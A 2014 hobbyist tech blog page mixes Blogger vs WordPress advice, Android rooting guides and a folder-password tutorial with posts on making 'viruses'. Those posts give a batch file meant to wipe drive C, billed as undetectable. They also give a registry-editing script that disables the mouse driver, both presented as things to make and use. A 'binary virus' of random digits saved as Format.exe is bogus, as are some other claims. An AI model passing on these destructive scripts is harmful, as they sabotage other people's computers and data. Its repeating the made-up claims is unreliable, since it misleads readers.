Friday, 29 August 2014

Mouse Not Work In GTA San Andreas

Hello My Friends,
I know very well How feel when you play san andreas without the working of mouse.
Here a simple solution for your problem. :-)
Start the Game(San Andreas). If mouse not work then click on Esc Key (upper left side) just return back to your game by click on Esc or "Resume" & if mouse not work. Do This again and again after sometime mouse work.
NOTE - Mostly This problem faced by Window 8/8.1 users.
I TRY TO FIX THIS PROBLEM. I PROVIDE A FILE THAT YOU USE AS SOLVE MOUSE PROBLEM.
You Are Join Us On Facebook
Rooting Phone
(Name as Rooted Galaxy Y Duos)

Friday, 22 August 2014

Blogger or WordPress, Which is better?

Blogger or WordPress, Which is better?

BLOGGER


Google owns blogger and hence applies its policies to it. One of the biggest advantages with blogger is that you’ll take hardly 10 minutes to setup a blog with Blogspot.com account. It is very easy to use and maintain. If you are done with setting your blogger account you can start posting immediately. Let’s discuss some points about blogger as a blogging platform one by one:
  •  With blogger it is really too easy to maintain account. You can easily add new pages and post. It is very easy to switch to different designs using any of the given templates and layouts.
  •  Domain name with blogger account is always like “yourblogname.blogspot.in” by default (depending upon your country ‘.in’ will be changed). But blogger gives you to choose your own domain name for $10 per year and connect your blogger account with your personalized domain name. The biggest advantage of this is you do not need to bother about hosting cost.
  •  No coding is needed. Blogger supports almost all features that a simple blog should have. If you have an account with blogger then you do not need to be from technical background. At present blogger supports many templates and you can use different layouts to customize those templates.
  •  Awesome gadgets are offered by blogger as their free features to all blogger account. You can easily add gadgets like news, weather reports, currency converter, videos, slideshow, search box etc by a single click. You can place these gadgets where ever you want in your blog by changing their position by customizing layouts. If you smartly arrange these gadgets, you will succeed to create a good blog without paying anything. You can add your own gadget if you have the code of that gadget.
  •  AdSense Integration is very easy with blogger because both are owned by same company. So those who want to start blogging to earn some money they can opt for blogger as it gives you by default option of AdSense to start with. You can integrate AdSense directly from your blog and after activation of AdSense you can show ads and make money online. You can use your blog to promote affiliate products to third party to simply make money. Through Amazon affiliate program blogger itself allows to generate affiliate revenue.
  •  With blogger account Google own all your data. If Google finds you for anything that is violating its policies than it can shut your account down without any notification. You would be aware of this fact if you have ever heard about “Google slap”.
These were some points about blogger as a blogging platform. If you want a personal blog and want to share your experiences with friends and relative then blogger is perfect for you. If you want to share your knowledge with your friends and you post very rarely then blogger should be your choice. You can earn money from blogger without spending even a single dollar. So design your own blog, customize it according to your need, use gadgets and enjoy amazing blogging experience with blogger.

WORDPRESS

Now let’s discuss about other blogging platform which is also most popular. WordPress it is well known as CMS (content management system). It is open source and hence offers you fully customization. You should not be confused with wordpress.org and wordpress.com. Both are owned by same owner but wordpress.com is something like blogger it offers you free hosting and domain name (yourwebsitename.wordpress.com). WordPress.org is official site of the wordpress project and we will discuss about the same. You can download latest version of wordpress from wordpress.org and can start your website and blog with a domain and server that you own. Let’s have some look on what wordpress offers us:
  • WordPress is absolutely free. All you need is hosting plan from a hosting company and a domain name. WordPress also offers single click installation if you’re hosting plan includes cpanel. With cpanel you can do a one-click installation, upgrade and removal of your WordPress platform.
  •  As you purchase your personalized domain name so it will be like “yoursitename.com”. If you are planning to have a business website, professional website or you need a functional website to sell your products then your domain name should represent an authority and personalized domain names are best option for the same.
  •  Wordpress removes all limitations and is open source so if you are coding expert then it is best for you. You can make wordpress do whatever you want to. It offers thousands of themes for almost all niches. You can go for premium wordpress themes if you need to setup highly professional blog.
  •  Supports thousands of plugins and gadgets. You can easily install and activate any plugin as per your need. Plugins do additional functions that you want to be added in your website. It makes your websites really functional and helps visitors in many ways. For example with wordpress plugin you can add a feature to comment from your Facebook account directly. Installation of plugin requires a single click. It’s that much easy to add and use a plugin and you can uninstall them whenever you want to.
  •  You can also integrate adsense account with your wordpress site after activation from Google. If your blog is powered with wordpress then you can customize it in a better way and make it search engine friendly. With default installation you need a couple of plugins and even a better theme to really maximize the Adsense potential. With WordPress on your own domain you can ping as many blog directories as you want, and start getting more traffic so can increase your earnings.
  •  You own your own domain name and have your own hosting so you own your content and you have complete ownership and copyright of content. You do not need to bother that someone can shut your account any time without informing you.

Create Binary Virus To Format Hard Disk

Create Binary Virus To Format Hard Disk
Create Binary Virus to Format Hard Disk


How To Create Virus To Format Hard Drive ?

   1. Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

If for some reason this does not work for you then comment below


Make A Virus For Disable Mouse




How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

How Create A Dangerous Virus For Computer

 How Create A Dangerous Virus For Computer

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

  1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How to Create a Computer Virus For Check your AntiVirus

How to Create a Computer Virus
  • This article is about how to create a test virus. This is not a joke. But why will you create a virus, most likely for testing your anti-virus or for fun. Always remember that this is only a test file and doesn't harm your computer at any cost. So here's a step by step procedure.

NOTE: THIS CODE ONLY CREATES A VIRUS TO TEST YOUR ANTIVIRUS SOFTWARE. IT IS NOT HARMFUL TO YOUR COMPUTER, IT IS ONLY INTENDED TO TEST YOUR ANTIVIRUS SOFTWARE.
STEPS
Create a Computer Virus Step 1.jpg



















1- Open a notepad (New Text Document.TXT).
Create a Computer Virus Step 2.jpg

2 - Copy the following code exactly onto it, and save the notepad.
  • Code: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Create a Computer Virus Step 4.jpg

3 -Rename the file from New Text Document.txt to myfile.com.
Create a Computer Virus Step 5.jpg
4 - Scan that file with you anti-virus. You'll find that that is a virus.
Create a Computer Virus Step 6.jpg

5 - Follow you anti-virus's decision and delete that file.

How to Put a Password on a Folder

How to Put a Password on a Folder

Level of difficulty: Easy

Different types of files, such as bank statements, expenses, diaries, photos and other private information may be prevented from being accessed by other people when it is password protected. By putting passwords on folders, unauthorized users are not capable of viewing the contents inside the protected folder just by clicking on it. A password must be provided in order for the contents inside a password-protected folder to be viewed by a user.

Materials Needed:
- Windows Operating System (OS)
- Compression Tools like WinRar or WinZip
Step 1
Choose the folder to password-protect. Select all files needed to be protected and place them inside the folder. Several folders may be placed inside the folder to be protected to sort out different types of files.
Step 2
Right click on the folder to be protected then scroll down to the option 'Properties' and click. Click on the 'Sharing' tab and check the box that says 'Make this folder private' and press the 'apply' button.
Step 3
A prompt will then appear and a password must be provided. Choose 'Yes'. Enter the password and confirm it and a third prompt will ask for a password hint, in case the password is lost or forgotten.
Step 4
Avoid using passwords that are easily guessed such as middle name, birthdates of family and even pet names. Use passwords that are 6-8 letters long and if possible, replace instances of some letters like ‘e’ with the number ‘3’ or ‘i’ with the number '1' and so on. Avoid writing the password or hints for your password on a piece of paper or notebooks that could be easily found when searched by other people.
Step 5
Password-protecting a zipped folder is easier. On the location for the zipped folder, right-click with the mouse and choose the 'new' option and choose 'Compressed (zipped) folder'. A prompt for the zipped folder’s name will appear.
Step 6
Name the zipped folder. Select the files or folders to be protected and drag towards your newly created zipped file.
Step 7
Protect your zipped folder by placing a password. Choose the zipped folder to be protected. Double-click on the chosen zipped file then click 'File' then 'Add Password' and at the prompt, enter the password twice and press 'OK'. You will now need a password to access your folder and files.

How ROOT SAMSUNG GALAXY S DUOS S7562

How Root Samsung Galaxy S Duos S7562
By Simple Method
STEP 1 - Download and install Samsung Galaxy S Duos drives on your computer/laptop
STEP 2 -Enable USB Debugging on your phone.For ENABLE USB DEBUGGING, open SETTING > DEVELOPERS OPTION > USB DEBUGGING > CLICK on it to enable USB DEBUGGING.
USB Debugging on Samsung Galaxy S Duos S7562
STEP 3 -Download and Open Root Genius Application On your computer/laptop.
STEP 4 -Once Root Genius Application Launched on your computer connect your phone to your computer.
STEP 5 -Once your phone successfully connected with your computer. Root Genius detect your phone automatically.
STEP 6 -Now click on the "ROOT NOW" button to start rooting process.
STEP 7 - Now Root Genius ROOTED your phone automatically and install KINGUSER Application.
NOTE - It may take some time.
STEP 8 -Now your Samsung Galaxy S Duos successfully ROOTED.
Root Genius Kinguser Installed on Samsung Galaxy S Duos S7562
HINT -For check this your phone rooted successfully or not Open MENU and there you see KINGUSER application mean your phone is rooted successfully.
CONTACT ME AT HERE -:
EMAIL - harshit1743@gmail.com
OR 
Root TECH My FB Page 

Thursday, 21 August 2014

How Root SAMSUNG GALAXY Y DUOS (GT-S6102) WITH "UPDATE(2014).ZIP"

HOW ROOT GALAXY Y DUOS 
Hello Friends As  You Know
A New Update File Provide by "ROOTED GALAXY PHONE" For Root Galaxy Y Duos But It is simple as you used your old update file. But Here I show you How you root your galaxy y duos.
SIMPLE METHOD
  1. Download the attachment called update(2014).zip from attachments below,put it in your SD card (root of sd card),
  2. Now reboot into recovery (Power + vol.up + Menu all together, release as soon as you see samsung logo),
  3. After rebooting into the recovery simply select install update from sd card and then browse the update.zip in your sd card and reboot your phone your device will be rooted.
HOW UNROOT GALAXY Y DUOS
SIMPLE METHOD
  1. Download the attachment called unroot.zip from attachments below,put it in your SD card (root of sd card),
  2. Now reboot into recovery (Power + vol.up + Menu all together, release as soon as you see samsung logo),
3.       After rebooting into the recovery simply select install unroot from sd card and then browse theunroot.zip in your sd card and reboot your phone your device will be unrooted.
LINK HERE
DOWNLOAD - UPDATE(2014).ZIP for root
DOWNLOAD - unroot.zip





Converting PDF to MOBI through Online Converter

Converting PDF to MOBI through Online Converter ! Open your browser and go to the  OnlineConverter  site. Opening the site Click on the  Cho...